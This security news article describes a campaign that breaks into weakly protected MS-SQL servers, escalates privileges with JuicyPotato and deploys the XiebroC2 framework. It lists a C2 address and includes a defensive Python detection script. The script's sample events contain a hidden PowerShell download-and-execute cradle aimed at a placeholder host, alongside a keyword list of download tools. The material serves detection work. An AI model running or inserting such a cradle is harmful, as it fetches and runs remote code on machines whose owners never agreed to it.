Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework


A sophisticated attack campaign targeting improperly managed Microsoft SQL servers has emerged, deploying the XiebroC2 command and control framework to establish persistent access to compromised systems.

The attack leverages weak credentials on publicly accessible database servers, allowing threat actors to gain an initial foothold and escalate privileges through a multi-stage deployment process.

XiebroC2, a publicly available C2 framework similar to CobaltStrike, provides attackers with comprehensive remote control capabilities including information gathering, defense evasion, and system manipulation.

The campaign follows a predictable pattern observed in MS-SQL server attacks, beginning with credential-based intrusions and progressing to coin mining operations.

However, the integration of XiebroC2 represents a significant escalation in attack sophistication, as the framework supports cross-platform operations across Windows, Linux, and macOS environments.

The framework’s open-source nature and extensive feature set make it an attractive alternative to commercial penetration testing tools, offering attackers capabilities such as reverse shells, file management, process control, and network monitoring without the associated costs.


ASEC analysts identified the malware during routine monitoring of attacks targeting MS-SQL servers, confirming the deployment of XiebroC2 alongside traditional coin mining payloads.

The framework’s implant component, written in the Go programming language, demonstrates advanced techniques for evading detection while maintaining persistent communication with command and control infrastructure.

XiebroC2’s GitHub page (Source – ASEC)

The attack methodology highlights the ongoing vulnerability of database servers that lack proper security hardening and access controls.

Privilege Escalation Through JuicyPotato Exploitation

The attack chain demonstrates a methodical approach to privilege escalation through the deployment of JuicyPotato, a well-documented exploit tool that abuses Windows token privileges.

Following successful authentication to the target MS-SQL server, attackers encounter the inherent limitation of service account privileges, which typically operate with restricted access rights by design.

To overcome this constraint, the threat actors utilize JuicyPotato to exploit specific token privileges within the currently running process account, effectively elevating their access from service-level to administrative permissions.

The privilege escalation technique capitalizes on the impersonation privileges often granted to service accounts, allowing the exploit to abuse these permissions and spawn processes with elevated rights.

Once JuicyPotato successfully escalates privileges, attackers proceed to download and execute the XiebroC2 framework using PowerShell commands.

This approach ensures that subsequent malicious activities operate with sufficient privileges to modify system configurations, install additional payloads, and establish persistent backdoors.

MS-SQL service downloading XiebroC2 (Source – ASEC)

The configuration data reveals the framework’s ability to collect comprehensive system information, including process identifiers, hardware identifiers, working directories, and user credentials, before establishing encrypted communication channels with the command and control server located at IP address 1.94.185.235 on port 8433.
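The two observables the article describes, the MS-SQL service process spawning a shell that runs a PowerShell download and an outbound connection to 1.94.185.235:8433, are both straightforward to alert on from endpoint telemetry. The following Python is an added example, not code from ASEC's report or from the XiebroC2 project; it runs simple detection rules over Sysmon-style process-creation and network-connection events. The event records, the download-cradle substrings and the placeholder URL are constructed for illustration, and the only indicator taken from the article is the C2 address and port.

```python
"""Detection rules for the MS-SQL -> XiebroC2 chain described above (added example).

Events are assumed to be Sysmon-style records already parsed into dicts:
EventID 1 = process creation, EventID 3 = network connection.
"""
from dataclasses import dataclass

# Indicator from the article: XiebroC2 command and control server.
C2_IP = "1.94.185.235"
C2_PORT = 8433

# A shell or script host whose direct parent is the SQL Server service is the
# shape that xp_cmdshell-style command execution produces on the endpoint.
SQL_SERVICE_IMAGE = "sqlservr.exe"
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed heuristics for a PowerShell / LOLBin download cradle.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "curl ", "certutil", "bitsadmin",
)


@dataclass
class Alert:
    rule: str
    event: dict


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev: dict) -> list:
    """Flag the MS-SQL service spawning a shell, and a download cradle inside it."""
    alerts = []
    parent = image_name(ev.get("ParentImage", ""))
    child = image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    if parent == SQL_SERVICE_IMAGE and child in SHELL_IMAGES:
        alerts.append(Alert("mssql_spawns_shell", ev))
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            alerts.append(Alert("mssql_shell_download_cradle", ev))
    return alerts


def check_network_connect(ev: dict) -> list:
    """Flag any outbound connection to the published XiebroC2 C2 endpoint."""
    if ev.get("DestinationIp") == C2_IP and int(ev.get("DestinationPort", 0)) == C2_PORT:
        return [Alert("xiebroc2_c2_connection", ev)]
    return []


def scan(events: list) -> list:
    """Run every rule over a list of events and return the alerts in order."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            alerts.extend(check_process_create(ev))
        elif ev.get("EventID") == 3:
            alerts.extend(check_network_connect(ev))
    return alerts


# Constructed sample telemetry: two benign records, one shell spawned by the SQL
# service with a download cradle, one C2 connection, one unrelated DNS lookup.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "CommandLine": "sqlservr.exe -sMSSQLSERVER"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/payload.ps1')\""},
    {"EventID": 3, "Image": r"C:\Windows\Temp\update.exe",
     "DestinationIp": "1.94.185.235", "DestinationPort": "8433"},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.event.get('Image')}")
```

The parent/child rule fires regardless of how the attacker reached command execution, so it catches the chain even when the download cradle is obfuscated past the substring heuristics; the C2 rule is narrow and should be treated as one indicator among many, since the address can change between campaigns.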


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.